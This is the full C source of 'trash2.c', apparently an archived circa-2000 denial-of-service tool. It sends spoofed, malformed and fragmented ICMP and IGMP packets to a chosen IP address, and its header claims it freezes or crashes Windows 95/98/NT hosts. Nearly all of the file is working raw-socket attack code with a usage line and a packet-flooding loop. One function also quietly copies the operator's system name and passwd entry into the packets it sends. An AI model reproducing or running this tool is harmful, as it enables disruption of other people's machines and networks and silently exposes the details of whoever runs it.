home *** CD-ROM | disk | FTP | other *** search
- /* Complex denial of service attack against Windows98/95/2000/NT Machines
- Overview: sends random, spoofed, ICMP/IGMP packets with random spoof source
- Result: Freezes the users machine or a CPU usage will rise to extreme
- lag. tested on:
- 2.0.35
- 2.2.5-15
- 2.2.9
- 2.0.36
- From a 56k I killed 2/5 Win/NT Box's, 5/5 Win98, 4/6 Win95.
- And those who didn't die, they where lagged to hell...
- You may freely alter this code, but give credit where credit is due
- gcc -o trash2 trash2.c will do fine...
- e-mail leet@ibw.com.ni for any questions.
- */
- /* greets go out to:
- bombfirst, L^Warrior, codesearc, Asphyx, killtron, ^S|lver, randip(); fucntion stolen from kox.c
- acidspill, glock24, p0larbear, xjust, bxj2k, JUSTaGIRL [you know who you are]
- Drth_Maul,everyone in #bitchx@unet, #outlaw@unet, #slackware@unet, #kernel@unet
- [outlaw]
-
- */
-
- #include <stdio.h>
- #include <unistd.h>
- #include <stdlib.h>
- #include <string.h>
- #include <sys/types.h>
- #include <sys/time.h>
- #include <sys/socket.h>
- #include <pwd.h>
- #include <time.h>
- #include <sys/utsname.h>
- #include <netdb.h>
- #include <netinet/in.h>
- #include <netinet/ip.h>
- #include <netinet/ip_icmp.h>
- #include <netinet/igmp.h>
-
- void banner(void)
- {
-
- printf("trash2.c - misteri0@unet [outlaw]\n\n");
- printf("\n\n");
- }
- void usage(const char *progname)
- {
- printf("usage:\n");
- printf("./trash [dst_ip] [# of packets]\n",progname);
- printf("\t[*] [ip_dst] : ex: 201.12.3.76\n");
- printf("\t[*] [number] : 100\n");
- printf("\t-----------------------------------------\n");
- }
- unsigned int randip()
- {
- struct hostent *he;
- struct sockaddr_in sin;
- char *buf = (char *)calloc(1, sizeof(char) * 16);
-
- sprintf(buf, "%d.%d.%d.%d",
- (random()%191)+23,
- (random()%253)+1,
- (random()%253)+1,
- (random()%253)+1);
-
- inet_aton(buf, (struct in_addr *)&sin);
- return sin.sin_addr.s_addr;
- }
- int resolve( const char *name, unsigned int port, struct sockaddr_in *addr )
- {
- struct hostent *host;
- memset(addr,0,sizeof(struct sockaddr_in));
- addr->sin_family = AF_INET;
- addr->sin_addr.s_addr = inet_addr(name);
- if (addr->sin_addr.s_addr == -1)
- {
- if (( host = gethostbyname(name) ) == NULL )
- {
- fprintf(stderr,"ERROR: Unable to resolve host %s\n",name);
- return(-1);
- }
- addr->sin_family = host->h_addrtype;
- memcpy((caddr_t)&addr->sin_addr,host->h_addr,host->h_length);
- }
- addr->sin_port = htons(port);
- return(0);
- }
- unsigned short in_cksum(addr, len)
- u_short *addr;
- int len;
- {
- register int nleft = len;
- register u_short *w = addr;
- register int sum = 0;
- u_short answer = 0;
-
- while (nleft > 1)
- {
- sum += *w++;
- nleft -= 2;
- }
-
- if (nleft == 1)
- {
- *(u_char *)(&answer) = *(u_char *)w ;
- sum += answer;
- }
-
- sum = (sum >> 16) + (sum & 0xffff);
- sum += (sum >> 16);
- answer = ~sum;
- return(answer);
- }
- int sendwin98bug(struct sockaddr_in *victim, unsigned long spoof)
- {
- int BIGIGMP = 1500;
- unsigned char *pkt;
- struct iphdr *ip;
- struct igmphdr *igmp;
- struct utsname *un;
- struct passwd *p;
-
- int i, s;
- int id = (random() % 40000) + 500;
-
-
- pkt = (unsigned char *)calloc(1, BIGIGMP);
-
- ip = (struct iphdr *)pkt;
- igmp = (struct igmphdr *)(pkt + sizeof(struct iphdr));
-
- ip->version = 4;
- ip->ihl = (sizeof *ip) / 4;
- ip->ttl = 255;
- ip->tot_len = htons(BIGIGMP);
- ip->protocol = IPPROTO_IGMP;
- ip->id = htons(id);
- ip->frag_off = htons(IP_MF);
- ip->saddr = spoof;
- ip->daddr = victim->sin_addr.s_addr;
- ip->check = in_cksum((unsigned short *)ip, sizeof(struct iphdr));
-
- igmp->type = 0;
- igmp->group = 0;
- igmp->csum = in_cksum((unsigned short *)igmp, sizeof(struct igmphdr));
-
- for(i = sizeof(struct iphdr) + sizeof(struct igmphdr) + 1;
- i < BIGIGMP; i++)
- pkt[i] = random() % 255;
- #ifndef I_GROK
- un = (struct utsname *)(pkt + sizeof(struct iphdr) +
- sizeof(struct igmphdr) + 40);
- uname(un);
- p = (struct passwd *)((void *)un + sizeof(struct utsname) + 10);
- memcpy(p, getpwuid(getuid()), sizeof(struct passwd));
- #endif
- if((s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
- {
- perror("error: socket()");
- return 1;
- }
-
- if(sendto(s, pkt, BIGIGMP, 0, victim,
- sizeof(struct sockaddr_in)) == -1)
- {
- perror("error: sendto()");
- return 1;
- }
- /* usleep(1000000); */
-
- for(i = 1; i < 5; i++)
- {
- if(i > 3)
- ip->frag_off = htons(((BIGIGMP-20) * i) >> 3);
- else
- ip->frag_off = htons(((BIGIGMP-20) * i) >> 3 | IP_MF);
- sendto(s, pkt, BIGIGMP, 0, victim, sizeof(struct sockaddr_in));
- /* usleep(2000000); */
- }
-
- free(pkt);
- close(s);
- return 0;
- }
-
- int send_winbomb(int socket,
- unsigned long spoof_addr,
- struct sockaddr_in *dest_addr)
- {
- unsigned char *packet;
- struct iphdr *ip;
- struct icmphdr *icmp;
- int rc;
-
- packet = (unsigned char *)malloc(sizeof(struct iphdr) +
- sizeof(struct icmphdr) + 8);
- ip = (struct iphdr *)packet;
- icmp = (struct icmphdr *)(packet + sizeof(struct iphdr));
- memset(ip,0,sizeof(struct iphdr) + sizeof(struct icmphdr) + 8);
- ip->ihl = 5;
- ip->version = 4;
- // ip->tos = 2;
- ip->id = htons(1234);
- ip->frag_off |= htons(0x2000);
- // ip->tot_len = 0;
- ip->ttl = 30;
- ip->protocol = IPPROTO_ICMP;
- ip->saddr = spoof_addr;
- ip->daddr = dest_addr->sin_addr.s_addr;
- ip->check = in_cksum(ip, sizeof(struct iphdr));
-
- icmp->type = rand() % 15;
- icmp->code = rand() % 15;
- icmp->checksum = in_cksum(icmp,sizeof(struct icmphdr) + 1);
- if (sendto(socket,
- packet,
- sizeof(struct iphdr) +
- sizeof(struct icmphdr) + 1,0,
- (struct sockaddr *)dest_addr,
- sizeof(struct sockaddr)) == -1)
- {
- return(-1);
- }
- ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct icmphdr) + 8);
- ip->frag_off = htons(8 >> 3);
- ip->frag_off |= htons(0x2000);
- ip->check = in_cksum(ip, sizeof(struct iphdr));
- icmp->type = rand() % 15;
- icmp->code = rand() % 15;
- icmp->checksum = 0;
- if (sendto(socket,
- packet,
- sizeof(struct iphdr) +
- sizeof(struct icmphdr) + 8,0,
- (struct sockaddr *)dest_addr,
- sizeof(struct sockaddr)) == -1)
- {
- return(-1);
- }
- free(packet);
- return(0);
- }
- int send_igmp(int socket,
- unsigned long spoof_addr,
- struct sockaddr_in *dest_addr)
- {
-
- unsigned char *packet;
- struct iphdr *ip;
- struct igmphdr *igmp;
- int rc;
-
-
- packet = (unsigned char *)malloc(sizeof(struct iphdr) +
- sizeof(struct igmphdr) + 8);
-
- ip = (struct iphdr *)packet;
- igmp = (struct igmphdr *)(packet + sizeof(struct iphdr));
-
- memset(ip,0,sizeof(struct iphdr) + sizeof(struct igmphdr) + 8);
-
- ip->ihl = 5;
- ip->version = 4;
- ip->id = htons(34717);
- ip->frag_off = htons(0x2000);
- ip->ttl = 255;
- ip->protocol = IPPROTO_IGMP;
- ip->saddr = spoof_addr;
- ip->daddr = dest_addr->sin_addr.s_addr;
- ip->check = in_cksum(ip, sizeof(struct iphdr));
-
-
- igmp->type = 8;
- igmp->code = 0;
-
- if (sendto(socket,
- packet,
- sizeof(struct iphdr) +
- sizeof(struct igmphdr) + 1,0,
- (struct sockaddr *)dest_addr,
- sizeof(struct sockaddr)) == -1)
- {
- return(-1);
- }
-
-
- ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct igmphdr) + 8);
- ip->frag_off = htons(8 >> 3);
- ip->version = 4;
- ip->id = htons(34717);
- ip->frag_off |= htons(0x2000);
- ip->ttl = 255;
- ip->protocol = IPPROTO_IGMP;
- ip->saddr = spoof_addr;
- ip->daddr = dest_addr->sin_addr.s_addr;
- ip->check = in_cksum(ip, sizeof(struct iphdr));
-
-
- igmp->type = 8;
- igmp->code = 0;
-
- if (sendto(socket,
- packet,
- sizeof(struct iphdr) +
- sizeof(struct igmphdr) + 1,0,
- (struct sockaddr *)dest_addr,
- sizeof(struct sockaddr)) == -1)
- {
- return(-1);
- }
-
-
- ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct igmphdr) + 8);
- ip->frag_off = htons(8 >> 3);
- ip->frag_off |= htons(0x2000);
- ip->check = in_cksum(ip, sizeof(struct iphdr));
-
- igmp->type = 0;
- igmp->code = 0;
-
- if (sendto(socket,
- packet,
- sizeof(struct iphdr) +
- sizeof(struct igmphdr) + 8,0,
- (struct sockaddr *)dest_addr,
- sizeof(struct sockaddr)) == -1)
- {
- return(-1);
- }
-
- free(packet);
- return(0);
-
- }
-
- int main(int argc, char **argv)
- {
- struct sockaddr_in dest_addr;
- unsigned int i,sock;
- unsigned long src_addr;
- banner();
- if ((argc != 3))
- {
- usage(argv[0]);
- return(-1);
- }
-
- if((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
- {
- fprintf(stderr,"ERROR: Opening raw socket.\n");
- return(-1);
- }
-
- /* if (resolve(argv[1],0,&dest_addr) == -1) { return(-1); } */
- src_addr = dest_addr.sin_addr.s_addr;
- if (resolve(argv[1],0,&dest_addr) == -1)
- {
- return(-1);
- }
- printf("Status: Connected....packets sent.\n",argv[0]);
- for (i = 0;i < atoi(argv[2]);i++)
- {
- if (send_winbomb(sock,randip(),&dest_addr) == -1 || send_igmp(sock,randip(),&dest_addr) == -1 || sendwin98bug(&dest_addr, randip()) )
- {
- fprintf(stderr,"ERROR: Unable to Connect To host.\n");
- return(-1);
- }
- usleep(10000);
- }
- }
- /* www.hack.co.za [2000]*/